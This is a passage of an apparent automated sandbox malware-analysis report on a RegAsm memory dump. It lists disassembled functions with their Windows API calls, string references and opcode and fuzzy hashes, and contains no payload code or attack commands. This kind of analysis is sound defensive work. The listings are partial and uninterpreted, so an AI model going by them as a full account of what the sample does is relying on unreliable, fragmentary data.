                                                                                                                                  • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 552707033-0
                                                                                                                                  • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                  • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                  • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                  • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                  Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                  • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                  • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                  • GetParent.USER32(?), ref: 00406136
                                                                                                                                  • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                  • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                  • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                  • String ID: A
                                                                                                                                  • API String ID: 2892645895-3554254475
                                                                                                                                  • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                  • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                  • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                  • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                  Function 0040C084 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 110stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                    • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                    • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                  • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                  • strchr.MSVCRT ref: 0040C140
                                                                                                                                  • strchr.MSVCRT ref: 0040C151
                                                                                                                                  • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                  • memset.MSVCRT ref: 0040C17A
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                  • String ID: 4$h
                                                                                                                                  • API String ID: 4019544885-1856150674
                                                                                                                                  • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                  • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                  • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                  • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                  Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                  • String ID: 0$6
                                                                                                                                  • API String ID: 4066108131-3849865405
                                                                                                                                  • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                  • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                  • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                  • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                  Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 004082EF
                                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                  • memset.MSVCRT ref: 00408362
                                                                                                                                  • memset.MSVCRT ref: 00408377
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$ByteCharMultiWide
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 290601579-0
                                                                                                                                  • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                                                  • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                  • Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                                                  • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                  Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                  • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                    • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                    • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                  • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                  • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                  • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                  • String ID: strings
                                                                                                                                  • API String ID: 3166385802-3030018805
                                                                                                                                  • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                  • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                  • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                  • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                  Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                  • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                  • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                  • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                  • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1331804452-0
                                                                                                                                  • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                  • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                  • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                  • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                  Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • <%s>, xrefs: 004100A6
                                                                                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                  • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$_snwprintf
                                                                                                                                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                  • API String ID: 3473751417-2880344631
                                                                                                                                  • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                  • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                  • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                  • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                  Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wcscat$_snwprintfmemset
                                                                                                                                  • String ID: %2.2X
                                                                                                                                  • API String ID: 2521778956-791839006
                                                                                                                                  • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                  • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                  • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                  • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                  Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                                                                                                  • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                                                                                                  • free.MSVCRT ref: 0041822B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PathTemp$free
                                                                                                                                  • String ID: %s\etilqs_$etilqs_
                                                                                                                                  • API String ID: 924794160-1420421710
                                                                                                                                  • Opcode ID: e31a5e2f3bccf906726aba0c544514771292db0e77bc602bd0d0b1ea9681ec6c
                                                                                                                                  • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                  • Opcode Fuzzy Hash: e31a5e2f3bccf906726aba0c544514771292db0e77bc602bd0d0b1ea9681ec6c
                                                                                                                                  • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                  Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                  • memset.MSVCRT ref: 004450CD
                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                    • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1471605966-0
                                                                                                                                  • Opcode ID: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                                                                  • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                  • Opcode Fuzzy Hash: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                                                                  • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                  Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 004100FB
                                                                                                                                  • memset.MSVCRT ref: 00410112
                                                                                                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                  • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                  • String ID: </%s>
                                                                                                                                  • API String ID: 3400436232-259020660
                                                                                                                                  • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                  • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                  • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                  • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                  Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                    • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                  • String ID: MS Sans Serif
                                                                                                                                  • API String ID: 210187428-168460110
                                                                                                                                  • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                  • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                  • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                  • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                  Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 00412057
                                                                                                                                    • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                  • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                  • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                  • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3550944819-0
                                                                                                                                  • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                  • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                  • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                  • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                  Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                  • free.MSVCRT ref: 0040B201
                                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                  • free.MSVCRT ref: 0040B224
                                                                                                                                  • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: free$memcpy$mallocwcslen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 726966127-0
                                                                                                                                  • Opcode ID: 3fbb0c8c7c7e4ea4d8d3f9a957d1a1ca0f5bc9a66927b7414586bca7b56f5ab2
                                                                                                                                  • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                  • Opcode Fuzzy Hash: 3fbb0c8c7c7e4ea4d8d3f9a957d1a1ca0f5bc9a66927b7414586bca7b56f5ab2
                                                                                                                                  • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                  Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                  • free.MSVCRT ref: 0040B0FB
                                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                  • free.MSVCRT ref: 0040B12C
                                                                                                                                  • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: free$memcpy$mallocstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3669619086-0
                                                                                                                                  • Opcode ID: 8a001e82ca3730f1e98eedeca7a3bb7ead531333626601bff92a244b64e8cf14
                                                                                                                                  • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                  • Opcode Fuzzy Hash: 8a001e82ca3730f1e98eedeca7a3bb7ead531333626601bff92a244b64e8cf14
                                                                                                                                  • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                  Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ??2@
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1033339047-0
                                                                                                                                  • Opcode ID: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                                                                                  • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                  • Opcode Fuzzy Hash: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                                                                                  • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49